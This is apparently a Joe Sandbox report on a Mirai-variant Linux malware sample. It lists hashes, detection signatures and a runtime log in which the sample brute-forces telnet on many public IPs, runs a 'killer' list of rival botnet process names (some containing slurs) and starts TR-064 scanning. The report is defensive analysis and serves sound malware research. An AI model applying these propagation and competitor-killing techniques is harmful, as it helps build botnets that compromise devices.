Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
debug.dbg.elf

Overview

General Information

Sample name:debug.dbg.elf
Analysis ID:1550999
MD5:fd7cbd6075d33e1bf912805ccbe2621d
SHA1:0dc9feeace2f76f3817d01119975c0aaa79bdf39
SHA256:6916edeeb161b2302c0b346fb92227a44cfed51a98edacd275147f7926df341e
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:96
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mirai
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1550999
Start date and time:2024-11-07 11:57:11 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 7m 38s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:debug.dbg.elf
Detection:MAL
Classification:mal96.troj.linELF@0/0@3/0
  • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
  • VT rate limit hit for: debug.dbg.elf
Command:/tmp/debug.dbg.elf
PID:5431
Exit Code:
Exit Code Info:
Killed:True
Standard Output:
SpasoBuild-BadWolf-MomentumProduc
Momentum Debugging Mode
[main] We are the only process on this system!
[ioctl_call] driver not found.
Momentum Debugging Mode
[main] We are the only process on this system!
[TelnetScanner] Scanner process initialized. Scanning started.
[TelnetScanner] FD5 Attempting to brute found IP 144.38.180.55
[TelnetScanner] FD6 Attempting to brute found IP 90.214.208.149
[TelnetScanner] FD7 Attempting to brute found IP 198.227.183.55
[TelnetScanner] FD8 Attempting to brute found IP 12.155.172.52
[TelnetScanner] FD9 Attempting to brute found IP 154.239.175.19
[TelnetScanner] FD10 Attempting to brute found IP 46.245.97.144
[TelnetScanner] FD11 Attempting to brute found IP 92.13.69.124
[TelnetScanner] FD12 Attempting to brute found IP 187.228.170.8
[TelnetScanner] FD13 Attempting to brute found IP 165.193.23.30
[TelnetScanner] FD14 Attempting to brute found IP 220.188.148.202
[TelnetScanner] FD15 Attempting to brute found IP 182.233.196.192
[TelnetScanner] FD16 Attempting to brute found IP 60.114.104.239
[TelnetScanner] FD17 Attempting to brute found IP 167.107.178.16
[TelnetScanner] FD18 Attempting to brute found IP 222.249.219.187
[TelnetScanner] FD19 Attempting to brute found IP 157.72.124.26
[TelnetScanner] FD20 Attempting to brute found IP 159.179.23.249
[TelnetScanner] FD21 Attempting to brute found IP 122.118.33.185
[TelnetScanner] FD22 Attempting to brute found IP 42.129.48.109
[TelnetScanner] FD23 Attempting to brute found IP 154.137.241.168
[TelnetScanner] FD24 Attempting to brute found IP 45.41.30.48
[TelnetScanner] FD25 Attempting to brute found IP 118.31.154.82
[TelnetScanner] FD26 Attempting to brute found IP 128.243.188.47
[TelnetScanner] FD27 Attempting to brute found IP 160.165.32.120
[TelnetScanner] FD28 Attempting to brute found IP 171.119.113.145
[TelnetScanner] FD29 Attempting to brute found IP 160.219.200.63
[TelnetScanner] FD30 Attempting to brute found IP 40.117.107.0
[TelnetScanner] FD31 Attempting to brute found IP 78.185.19.227
[TelnetScanner] FD32 Attempting to brute found IP 161.29.101.223
[TelnetScanner] FD33 Attempting to brute found IP 128.52.175.122
[TelnetScanner] FD34 Attempting to brute found IP 156.49.176.215
[TelnetScanner] FD35 Attempting to brute found IP 196.205.138.120
[TelnetScanner] FD36 Attempting to brute found IP 86.224.145.190
[TelnetScanner] FD37 Attempting to brute found IP 174.209.10.2
[TelnetScanner] FD38 Attempting to brute found IP 207.60.175.68
[TelnetScanner] FD39 Attempting to brute found IP 81.141.250.69
[TelnetScanner] FD40 Attempting to brute found IP 131.77.247.50
[TelnetScanner] FD41 Attempting to brute found IP 109.201.255.175
[TelnetScanner] FD42 Attempting to brute found IP 137.57.45.175
[TelnetScanner] FD43 Attempting to brute found IP 220.108.149.100
[TelnetScanner] FD44 Attempting to brute found IP 193.51.5.71
[TelnetScanner] FD45 Attempting to brute found IP 171.193.98.94
[TelnetScanner] FD46 Attempting to brute found IP 112.72.49.159
[TelnetScanner] FD47 Attempting to brute found IP 80.180.18.98
[TelnetScanner] FD48 Attempting to brute found IP 180.96.78.149
[TelnetScanner] FD49 Attempting to brute found IP 12.215.142.86
[TelnetScanner] FD50 Attempting to brute found IP 180.155.178.33
[TelnetScanner] FD51 Attempting to brute found IP 162.236.208.131
[TelnetScanner] FD52 Attempting to brute found IP 80.226.118.23
[TelnetScanner] FD53 Attempting to brute found IP 106.130.68.178
[TelnetScanner] FD54 Attempting to brute found IP 79.132.89.112
[TelnetScanner] FD55 Attempting to brute found IP 12.165.34.188
[TelnetScanner] FD56 Attempting to brute found IP 174.84.69.60
[TelnetScanner] FD57 Attempting to brute found IP 218.34.132.166
[TelnetScanner] FD58 Attempting to brute found IP 97.104.220.6
[TelnetScanner] FD59 Attempting to brute found IP 78.61.85.38
[TelnetScanner] FD60 Attempting to brute found IP 110.39.148.250
[TelnetScanner] FD61 Attempting to brute found IP 178.143.17.96
[TelnetScanner] FD62 Attempting to brute found IP 198.163.211.242
[TelnetScanner] FD63 Attempting to brute found IP 70.248.64.207
[TelnetScanner] FD64 Attempting to brute found IP 96.163.172.32
[TelnetScanner] FD65 Attempting to brute found IP 223.150.241.220
[TelnetScanner] FD66 Attempting to brute found IP 77.38.54.150
[TelnetScanner] FD67 Attempting to brute found IP 71.234.3.59
[TelnetScanner] FD68 Attempting to brute found IP 152.55.102.238
[TelnetScanner] FD69 Attempting to brute found IP 142.121.147.161
[TelnetScanner] FD70 Attempting to brute found IP 66.163.190.7
[TelnetScanner] FD71 Attempting to brute found IP 131.37.133.39
[TelnetScanner] FD72 Attempting to brute found IP 211.203.171.23
[TelnetScanner] FD73 Attempting to brute found IP 155.130.102.8
[TelnetScanner] FD74 Attempting to brute found IP 138.105.105.159
[TelnetScanner] FD75 Attempting to brute found IP 129.3.14.255
[TelnetScanner] FD76 Attempting to brute found IP 163.40.20.142
[TelnetScanner] FD77 Attempting to brute found IP 53.95.188.14
[TelnetScanner] FD78 Attempting to brute found IP 89.153.207.175
[TelnetScanner] FD79 Attempting to brute found IP 124.225.211.33
[TelnetScanner] FD80 Attempting to brute found IP 95.75.253.253
[TelnetScanner] FD81 Attempting to brute found IP 23.121.174.92
[TelnetScanner] FD82 Attempting to brute found IP 50.22.151.61
[TelnetScanner] FD83 Attempting to brute found IP 186.198.250.34
[TelnetScanner] FD84 Attempting to brute found IP 2.168.80.181
[TelnetScanner] FD85 Attempting to brute found IP 1.198.187.4
[TelnetScanner] FD86 Attempting to brute found IP 166.172.109.29
[TelnetScanner] FD87 Attempting to brute found IP 102.61.117.64
[TelnetScanner] FD88 Attempting to brute found IP 138.136.132.124
[TelnetScanner] FD89 Attempting to brute found IP 110.218.241.154
[TelnetScanner] FD90 Attempting to brute found IP 73.123.25.202
[TelnetScanner] FD91 Attempting to brute found IP 5.185.3.170
[TelnetScanner] FD92 Attempting to brute found IP 91.98.200.129
[TelnetScanner] FD93 Attempting to brute found IP 179.204.124.183
[TelnetScanner] FD94 Attempting to brute found IP 176.133.64.66
[TelnetScanner] FD95 Attempting to brute found IP 68.27.161.2
[TelnetScanner] FD96 Attempting to brute found IP 116.96.35.22
[TelnetScanner] FD97 Attempting to brute found IP 72.215.189.23
[TelnetScanner] FD98 Attempting to brute found IP 145.145.81.5
[TelnetScanner] FD99 Attempting to brute found IP 98.108.52.182
[TelnetScanner] FD100 Attempting to brute found IP 109.42.181.206
[TelnetScanner] FD101 Attempting to brute found IP 181.143.145.183
[TelnetScanner] FD102 Attempting to brute found IP 141.71.122.189
[TelnetScanner] FD103 Attempting to brute found IP 41.198.39.179
[TelnetScanner] FD104 Attempting to brute found IP 34.59.58.112
[TelnetScanner] FD105 Attempting to brute found IP 143.44.21.74
[TelnetScanner] FD106 Attempting to brute found IP 96.169.164.205
[TelnetScanner] FD107 Attempting to brute found IP 163.126.157.42
[TelnetScanner] FD11 connected. Trying :9%1N
[TelnetScanner] FD12 connected. Trying :
[TelnetScanner] FD13 connected. Trying :DFGD
[TelnetScanner] FD14 connected. Trying :DFG@
[TelnetScanner] FD15 connected. Trying :ECGG
[TelnetScanner] FD16 connected. Trying :
[TelnetScanner] FD17 connected. Trying :,CDG
[TelnetScanner] FD25 connected. Trying ECFF:
[TelnetScanner] FD33 connected. Trying :
[TelnetScanner] FD36 connected. Trying ECFF:
[TelnetScanner] FD37 connected. Trying :DFGB
[TelnetScanner] FD38 connected. Trying :DFGC
[TelnetScanner] FD39 connected. Trying :GDEBC@
[TelnetScanner] FD40 connected. Trying :A;F
[TelnetScanner] FD41 connected. Trying :GDE
[TelnetScanner] FD42 connected. Trying :DFGB
[TelnetScanner] FD43 connected. Trying :
[TelnetScanner] FD44 connected. Trying :DFGD
[TelnetScanner] FD45 connected. Trying :A;F
[TelnetScanner] FD46 connected. Trying :<@
[TelnetScanner] FD50 connected. Trying :%D180
[TelnetScanner] FD55 connected. Trying :1;NGND
[TelnetScanner] FD63 connected. Trying :ECGN
[TelnetScanner] FD71 connected. Trying :
[TelnetScanner] FD76 connected. Trying :
[TelnetScanner] FD84 connected. Trying :
[TelnetScanner] FD89 connected. Trying :A;F
[TelnetScanner] FD97 connected. Trying :GFDO
[TelnetScanner] FD102 connected. Trying :<@
[TelnetScanner] FD33 connection gracefully closed
[TelnetScanner] FD33 lost connection
[TelnetScanner] FD33 retrying with different auth combo!
[TelnetScanner] FD33 connected. Trying :ECGN
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :C
[TelnetScanner] FD8 connected. Trying :9%1N
[TelnetScanner] FD34 connected. Trying :5
[TelnetScanner] FD33 connection gracefully closed
[TelnetScanner] FD33 lost connection
[TelnetScanner] FD33 retrying with different auth combo!
[TelnetScanner] FD33 connected. Trying :
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :,CDG
[TelnetScanner] FD52 connected. Trying :
[TelnetScanner] FD51 connected. Trying :A;F
[TelnetScanner] FD48 connected. Trying :
[TelnetScanner] FD49 connected. Trying :,CDG
[TelnetScanner] FD47 connected. Trying :5
[TelnetScanner] FD53 connected. Trying :
[TelnetScanner] FD54 connected. Trying :
[TelnetScanner] FD91 connected. Trying :DFGC
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :
[TelnetScanner] FD105 connected. Trying :DFGB
[TelnetScanner] FD33 connection gracefully closed
[TelnetScanner] FD33 lost connection
[TelnetScanner] FD33 retrying with different auth combo!
[TelnetScanner] FD33 connected. Trying :
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying ECFF:
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :DFGC
[TelnetScanner] FD33 connection gracefully closed
[TelnetScanner] FD33 lost connection
[TelnetScanner] FD33 retrying with different auth combo!
[TelnetScanner] FD108 Attempting to brute found IP 170.193.246.59
[TelnetScanner] FD109 Attempting to brute found IP 72.227.14.126
[TelnetScanner] FD110 Attempting to brute found IP 143.28.210.25
[TelnetScanner] FD111 Attempting to brute found IP 182.9.155.227
[TelnetScanner] FD112 Attempting to brute found IP 38.85.211.85
[TelnetScanner] FD113 Attempting to brute found IP 71.243.148.75
[TelnetScanner] FD114 Attempting to brute found IP 220.143.58.188
[TelnetScanner] FD115 Attempting to brute found IP 220.158.61.65
[TelnetScanner] FD116 Attempting to brute found IP 116.60.45.151
[TelnetScanner] FD117 Attempting to brute found IP 60.87.203.74
[TelnetScanner] FD118 Attempting to brute found IP 147.208.23.121
[TelnetScanner] FD119 Attempting to brute found IP 141.32.204.216
[TelnetScanner] FD120 Attempting to brute found IP 51.237.42.18
[TelnetScanner] FD121 Attempting to brute found IP 60.66.37.253
[TelnetScanner] FD122 Attempting to brute found IP 64.124.205.224
[TelnetScanner] FD123 Attempting to brute found IP 158.208.96.254
[TelnetScanner] FD124 Attempting to brute found IP 168.172.104.164
[TelnetScanner] FD125 Attempting to brute found IP 163.43.19.107
[TelnetScanner] FD126 Attempting to brute found IP 20.196.118.129
[TelnetScanner] FD127 Attempting to brute found IP 170.43.95.128
[TelnetScanner] FD128 Attempting to brute found IP 98.179.150.8
[TelnetScanner] FD129 Attempting to brute found IP 203.213.243.217
[TelnetScanner] FD130 Attempting to brute found IP 164.121.199.69
[TelnetScanner] FD131 Attempting to brute found IP 175.178.158Momentum Debugging Mode
[main] We are the only process on this system!
[killer] initialising
[killer-kill-by-name] finding value: 902i13
[killer-kill-by-name] finding value: BzSxLxBxeY
[killer-kill-by-name] finding value: HOHO-LUGO7
[killer-kill-by-name] finding value: HOHO-U79OL
[killer-kill-by-name] finding value: JuYfouyf87
[killer-kill-by-name] finding value: NiGGeR69xd
[killer-kill-by-name] finding value: SO190Ij1X
[killer-kill-by-name] finding value: LOLKIKEEEDDE
[killer-kill-by-name] finding value: ekjheory98e
[killer-kill-by-name] finding value: scansh4
[killer-kill-by-name] finding value: MDMA
[killer-kill-by-name] finding value: fdevalvex
[killer-kill-by-name] finding value: scanspc
[killer-kill-by-name] finding value: MELTEDNINJAREALZ
[killer-kill-by-name] finding value: flexsonskids
[killer-kill-by-name] finding value: scanx86
[killer-kill-by-name] finding value: MISAKI-U79OL
[killer-kill-by-name] finding value: foAxi102kxe
[killer-kill-by-name] finding value: swodjwodjwoj
[killer-kill-by-name] finding value: MmKiy7f87l
[killer-kill-by-name] finding value: freecookiex86
[killer-kill-by-name] finding value: sysgpu
[killer-kill-by-name] finding value: frgege
[killer-kill-by-name] finding value: sysupdater
[killer-kill-by-name] finding value: 0DnAzepd
[killer-kill-by-name] finding value: NiGGeRD0nks69
[killer-kill-by-name] finding value: frgreu
[killer-kill-by-name] finding value: 0x766f6964
[killer-kill-by-name] finding value: NiGGeRd0nks1337
[killer-kill-by-name] finding value: gaft
[killer-kill-by-name] finding value: urasgbsigboa
[killer-kill-by-name] finding value: 120i3UI49
[killer-kill-by-name] finding value: OaF3
[killer-kill-by-name] finding value: geae
[killer-kill-by-name] finding value: vaiolmao
[killer-kill-by-name] finding value: 123123a
[killer-kill-by-name] finding value: Ofurain0n4H34D
[killer-kill-by-name] finding value: ggTrex
[killer-kill-by-name] finding value: ew
[killer-kill-by-name] finding value: wasads
[killer-kill-by-name] finding value: 1293194hjXD
[killer-kill-by-name] finding value: OthLaLosn
[killer-kill-by-name] finding value: ggt
[killer-kill-by-name] finding value: wget-log
[killer-kill-by-name] finding value: 1337SoraLOADER
[killer-kill-by-name] finding value: SAIAKINA
[killer-kill-by-name] finding value: ggtq
[killer-kill-by-name] finding value: 1378bfp919GRB1Q2
[killer-kill-by-name] finding value: SAIAKUSO
[killer-kill-by-name] finding value: ggtr
[killer-kill-by-name] finding value: 14Fa
[killer-kill-by-name] finding value: SEXSLAVE1337
[killer-kill-by-name] finding value: ggtt
[killer-kill-by-name] finding value: 1902a3u912u3u4
[killer-kill-by-name] finding value: haetrghbr
[killer-kill-by-name] finding value: 19ju3d
[killer-kill-by-name] finding value: SORAojkf120
[killer-kill-by-name] finding value: hehahejeje92
[killer-kill-by-name] finding value: 2U2JDJA901F91
[killer-kill-by-name] finding value: SlaVLav12
[killer-kill-by-name] finding value: helpmedaddthhhhh
[killer-kill-by-name] finding value: 2wgg9qphbq
[killer-kill-by-name] finding value: Slav3Th3seD3vices
[killer-kill-by-name] finding value: hzSmYZjYMQ
[killer-kill-by-name] finding value: 5Gbf
[killer-kill-by-name] finding value: sora
[killer-kill-by-name] finding value: SoRAxD123LOL
[killer-kill-by-name] finding value: iaGv
[killer-kill-by-name] finding value: 5aA3
[killer-kill-by-name] finding value: SoRAxD420LOL
[killer-kill-by-name] finding value: insomni
[killer-kill-by-name] finding value: 640277
[killer-kill-by-name] finding value: SoraBeReppin1337
[killer-kill-by-name] finding value: ipcamCache
[killer-kill-by-name] finding value: 66tlGg9Q
[killer-kill-by-name] finding value: jUYfouyf87
[killer-kill-by-name] finding value: 6ke3
[killer-kill-by-name] finding value: TOKYO3
[killer-kill-by-name] finding value: lyEeaXul2dULCVxh
[killer-kill-by-name] finding value: 93OfjHZ2z
[killer-kill-by-name] finding value: TY2gD6MZvKc7KU6r
[killer-kill-by-name] finding value: mMkiy6f87l
[killer-kill-by-name] finding value: A023UU4U24UIU
[killer-kill-by-name] finding value: TheWeeknd
[killer-kill-by-name] finding value: mioribitches.12
[TelnetScanner] FD132 Attempting to brute found IP 106.211.114.182
[TelnetScanner] FD33 connected. Trying :%D180
[TelnetScanner] FD109 connected. Trying :, %?&
[TelnetScanner] FD110 connected. Trying :A;F
[TelnetScanner] FD115 connected. Trying :DFGB
[TelnetScanner] FD116 connected. Trying :GDE
[TelnetScanner] FD117 connected. Trying :5
[TelnetScanner] FD118 connected. Trying :,CDG
[TelnetScanner] FD119 connected. Trying :
[TelnetScanner] FD120 connected. Trying :%D180
[TelnetScanner] FD123 connected. Trying :9%1N
[TelnetScanner] FD128 connected. Trying :
[TelnetScanner] FD132 connected. Trying :
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD11 connected. Trying :
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :1;NGND
[TelnetScanner] FD33 connection gracefully closed
[TelnetScanner] FD33 lost connection
[TelnetScanner] FD33 retrying with different auth combo!
[TelnetScanner] FD33 connected. Trying :
[TelnetScanner] FD5 connected. Trying :
[TelnetScanner] FD6 connected. Trying :GDE
[TelnetScanner] FD7 connected. Trying :, %?&
[TelnetScanner] FD9 connected. Trying :
[TelnetScanner] FD10 connected. Trying :
[TelnetScanner] FD11 connection gracefully closed
[TelnetScanner] FD11 lost connection
[TelnetScanner] FD11 retrying with different auth combo!
[TelnetScanner] FD112 connected. Trying :, %?&
[TelnetScanner] FD33 connection gracefully closed
[TelnetScanner] FD33 lost connection
[TelnetScanner] FD33 retrying with different auth combo!
[TelnetScanner] FD33 connected. Trying :A;F
[TelnetScanner] FD113 connected. Trying ECFF:
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :
[TelnetScanner] FD57 connected. Trying :
[TelnetScanner] FD56 connected. Trying :%D180
[TelnetScanner] FD60 connected. Trying :
[TelnetScanner] FD64 connected. Trying :A;F
[TelnetScanner] FD73 connected. Trying :DFG@
[TelnetScanner] FD74 connected. Trying :DFGC
[TelnetScanner] FD93 connected. Trying :ECGN
[TelnetScanner] FD121 connected. Trying ECFF:
[TelnetScanner] FD131 connected. Trying :
[TelnetScanner] FD130 connected. Trying :ECGN
[TelnetScanner] FD33 connection gracefully closed
[TelnetScanner] FD33 lost connection
[TelnetScanner] FD33 retrying with different auth combo!
[TelnetScanner] FD33 connected. Trying :GDE
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :DFGC
[TelnetScanner] FD33 connection gracefully closed
[TelnetScanner] FD33 lost connection
[TelnetScanner] FD33 retrying with different auth combo!
[TelnetScanner] FD33 connected. Trying :C
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD16 connected. Trying :1;NGND
[TelnetScanner] FD33 connection gracefully closed
[TelnetScanner] FD33 lost connection
[TelnetScanner] FD33 retrying with different auth combo!
[TelnetScanner] FD33 connected. Trying :
[TelnetScanner] FD16 connection gracefully closed
[TelnetScanner] FD16 lost connection
[TelnetScanner] FD16 retrying with different auth combo!
[TelnetScanner] FD114 connected. Trying :
[TelnetScanner] FD33 connection gracefully closed
[TelnetScanner] FD33 lost connection
[TelnetScanner] FD33 retrying with different auth combo!
[TelnetScanner] FD33 connected. Trying :GDE
[TelnetScanner] FD
[killer-kill-by-name] finding value: A5p9
[killer-kill-by-name] finding value: TheWeeknds
[killer-kill-by-name] finding value: mnblkjpoi
[killer-kill-by-name] finding value: AbAd
[killer-kill-by-name] finding value: Tokyos
[killer-kill-by-name] finding value: neb
[killer-kill-by-name] finding value: Akiru
[killer-kill-by-name] finding value: U8inTz
[killer-kill-by-name] finding value: netstats
[killer-kill-by-name] finding value: Alex
[killer-kill-by-name] finding value: W9RCAKM20T
[killer-kill-by-name] finding value: newnetword
[killer-kill-by-name] finding value: Ayo215
[killer-kill-by-name] finding value: Word
[killer-kill-by-name] finding value: nloads
[killer-kill-by-name] finding value: BAdAsV
[killer-kill-by-name] finding value: Wordmane
[killer-kill-by-name] finding value: notyakuzaa
[killer-kill-by-name] finding value: Belch
[killer-kill-by-name] finding value: Wordnets
[killer-kill-by-name] finding value: obp
[killer-kill-by-name] finding value: BigN0gg0r420
[killer-kill-by-name] finding value: X0102I34f
[killer-kill-by-name] finding value: ofhasfhiafhoi
[killer-kill-by-name] finding value: BzSxLxBxeY
[killer-kill-by-name] finding value: X19I239124UIU
[killer-kill-by-name] finding value: oism
[killer-kill-by-name] finding value: Deported
[killer-kill-by-name] finding value: XSHJEHHEIIHWO
[killer-kill-by-name] finding value: olsVNwo12
[killer-kill-by-name] finding value: DeportedDeported
[killer-kill-by-name] finding value: XkTer0GbA1
[killer-kill-by-name] finding value: onry0v03
[killer-kill-by-name] finding value: FortniteDownLOLZ
[killer-kill-by-name] finding value: Y0urM0mGay
[killer-kill-by-name] finding value: pussyfartlmaojk
[killer-kill-by-name] finding value: GrAcEnIgGeRaNn
[killer-kill-by-name] finding value: YvdGkqndCO
[killer-kill-by-name] finding value: qGeoRBe6BE
[killer-kill-by-name] finding value: GuiltyCrown
[killer-kill-by-name] finding value: ZEuS69
[killer-kill-by-name] finding value: s4beBsEQhd
[killer-kill-by-name] finding value: HOHO-KSNDO
[killer-kill-by-name] finding value: ZEuz69
[killer-kill-by-name] finding value: sat1234
[killer-kill-by-name] finding value: HOHO-LUGO7
[killer-kill-by-name] finding value: aj93hJ23
[killer-kill-by-name] finding value: scanHA
[killer-kill-by-name] finding value: alie293z0k2L
[killer-kill-by-name] finding value: scanJoshoARM
[killer-kill-by-name] finding value: HellInSide
[killer-kill-by-name] finding value: ayyyGangShit
[killer-kill-by-name] finding value: scanJoshoARM5
[killer-kill-by-name] finding value: HighFry
[killer-kill-by-name] finding value: b1gl
[killer-kill-by-name] finding value: scanJoshoARM6
[killer-kill-by-name] finding value: IWhPyucDbJ
[killer-kill-by-name] finding value: boatnetz
[killer-kill-by-name] finding value: scanJoshoARM7
[killer-kill-by-name] finding value: IuYgujeIqn
[killer-kill-by-name] finding value: btbatrtah
[killer-kill-by-name] finding value: scanJoshoM68K
[killer-kill-by-name] finding value: JJDUHEWBBBIB
[killer-kill-by-name] finding value: scanJoshoMIPS
[killer-kill-by-name] finding value: JSDGIEVIVAVIG
[killer-kill-by-name] finding value: cKbVkzGOPa
[killer-kill-by-name] finding value: scanJoshoMPSL
[killer-kill-by-name] finding value: JuYfouyf87
[killer-kill-by-name] finding value: ccAD
[killer-kill-by-name] finding value: scanJoshoPPC
[killer-kill-by-name] finding value: KAZEN-OIU97
[killer-kill-by-name] finding value: chickenxings
[killer-kill-by-name] finding value: scanJoshoSH4
[killer-kill-by-name] finding value: yakuskzm8
[killer-kill-by-name] finding value: KAZEN-PO78H
[killer-kill-by-name] finding value: cleaner
[killer-kill-by-name] finding value: scanJoshoSPC
[killer-kill-by-name] finding value: KAZEN-U79OL
[killer-kill-by-name] finding value: dbeef
[killer-kill-by-name] finding value: scanJoshoX86
[killer-kill-by-name] finding value: yakuz4c24
[killer-kill-by-name] finding value: KETASHI32
[killer-kill-by-name] finding value: ddrwelper
[killer-kill-by-name] finding value: scanarm5
[killer-kill-by-name] finding value: zPnr6HpQj2
[killer-kill-by-name] finding value: Kaishi-Iz90Y
[killer-kill-by-name] finding value: deexec
[killer-kill-by-name] finding value: scanarm6
[killer-kill-by-name] finding value: zdrtfxcgy
[killer-kill-by-name] finding value: Katrina32
[killer-kill-by-name] finding value: doCP3fVj
[killer-kill-by-name] finding value: scanarm7
[killer-kill-by-name] finding value: zxcfhuio
[killer-kill-by-name] finding value: Ksif91je39
[killer-kill-by-name] finding value: scanm68k
[killer-kill-by-name] finding value: Kuasa
[killer-kill-by-name] finding value: dvrhelper
[killer-kill-by-name] finding value: scanmips
[killer-kill-by-name] finding value: KuasaBinsMate
[killer-kill-by-name] finding value: eQnOhRk85r
[killer-kill-by-name] finding value: scanmpsl
[killer-kill-by-name] finding value: LOLHHHOHOHBUI
[killer-kill-by-name] finding value: eXK20CL12Z
[killer-kill-by-name] finding value: nya
[killer-kill-by-name] finding value: mezy
[killer-kill-by-name] finding value: QBotBladeSPOOKY
[killer-kill-by-name] finding value: hikariwashere
[killer-kill-by-name] finding value: 0DnAzepd
[killer-kill-by-name] finding value: p4029x91xx
[killer-kill-by-name] finding value: 32uhj4gbejh
[killer-kill-by-name] finding value: zhr
[killer-kill-by-name] finding value: a.out
[killer-kill-by-name] finding value: lzrd
[killer-kill-by-name] finding value: PownedSecurity69
[killer-kill-by-name] finding value: ggt
[killer-kill-by-name] finding value: .ares
[killer-kill-by-name] finding value: fxlyazsxhy
[killer-kill-by-name] finding value: jnsd9sdoila
[killer-kill-by-name] finding value: BzSxLxBxeY
[killer-kill-by-name] finding value: yourmomgaeis
[killer-kill-by-name] finding value: sdfjiougsioj
[killer-kill-by-name] finding value: Oasis
[killer-kill-by-name] finding value: ggtr
[killer-kill-by-name] finding value: SEGRJIJHFVNHSNHEIHFOS
[killer-kill-by-name] finding value: apep999
[killer-kill-by-name] finding value: KOWAI-BAdAsV
[killer-kill-by-name] finding value: KOWAI-SAD
[killer-kill-by-name] finding value: jHKipU7Yl
[killer-kill-by-name] finding value: airdropmalware
[killer-kill-by-name] finding value: your_verry_fucking_gay
[killer-kill-by-name] finding value: Big-Bro-Bright
[killer-kill-by-name] finding value: sefaexec
[killer-kill-by-name] finding value: shirololi
[killer-kill-by-name] finding value: eagle.
[killer-kill-by-name] finding value: For-Gai-Mezy
[killer-kill-by-name] finding value: 0x6axNL
[killer-kill-by-name] finding value: cloqkisvspooky
[killer-kill-by-name] finding value: myth
[killer-kill-by-name] finding value: SwergjmioG
[killer-kill-by-name] finding value: KILLEJW(IU(JIWERGFJGJWJRG
[killer-kill-by-name] finding value: Hetrh
[killer-kill-by-name] finding value: wewrthe
[killer-kill-by-name] finding value: IuFdKssCxz
[killer-kill-by-name] finding value: jSDFJIjio
[killer-kill-by-name] finding value: OnrYoXd666
[killer-kill-by-name] finding value: ewrtkjoketh
[killer-kill-by-name] finding value: ajbdf89wu823
[killer-kill-by-name] finding value: AAaasrdgs
[killer-kill-by-name] finding value: WsGA4@F6F
[killer-kill-by-name] finding value: GhostWuzHere666
[killer-kill-by-name] finding value: BOGOMIPS
[killer-kill-by-name] finding value: sfc6aJfIuY
[killer-kill-by-name] finding value: Demon.
[killer-kill-by-name] finding value: xeno-is-god
[killer-kill-by-name] finding value: ICY-P-0ODIJ
[killer-kill-by-name] finding value: gSHUIHIfh
[killer-kill-by-name] finding value: wrgL
[killer-kill-by-name] finding value: hu87VhvQPz
[killer-kill-by-name] finding value: dakuexecbin
[killer-kill-by-name] finding value: TacoBellGodYo
[killer-kill-by-name] finding value: loligang
[killer-kill-by-name] finding value: Execution
[killer-kill-by-name] finding value: orbitclient
[killer-kill-by-name] finding value: Amnesia
[killer-kill-by-name] finding value: Owari
[killer-kill-by-name] finding value: UnHAnaAW
[killer-kill-by-name] finding value: z3hir
[killer-kill-by-name] finding value: obbo
[killer-kill-by-name] finding value: miori
[killer-kill-by-name] finding value: eagle
[killer-kill-by-name] finding value: doxxRollie
[killer-kill-by-name] finding value: lessie.
[killer-kill-by-name] finding value: sora
[killer-kill-by-name] finding value: Momentum Debugging Mode
[main] We are the only process on this system!
[Tr064] Tr064 process initialized. scanning started.
[Tr064] FD5 connected to 168.30.180.55
[Tr064] FD6 connected to 198.219.183.55
[Tr064] FD7 connected to 165.239.16.148
[Tr064] FD8 connected to 203.84.99.53
[Tr064] FD9 connected to 45.38.44.1
[Tr064] FD10 connected to 173.66.213.27
[Tr064] FD11 connected to 178.51.106.237
[Tr064] FD27 connected to 95.178.151.109
[Tr064] FD28 connected to 4.230.209.133
[Tr064] FD29 connected to 201.250.120.24
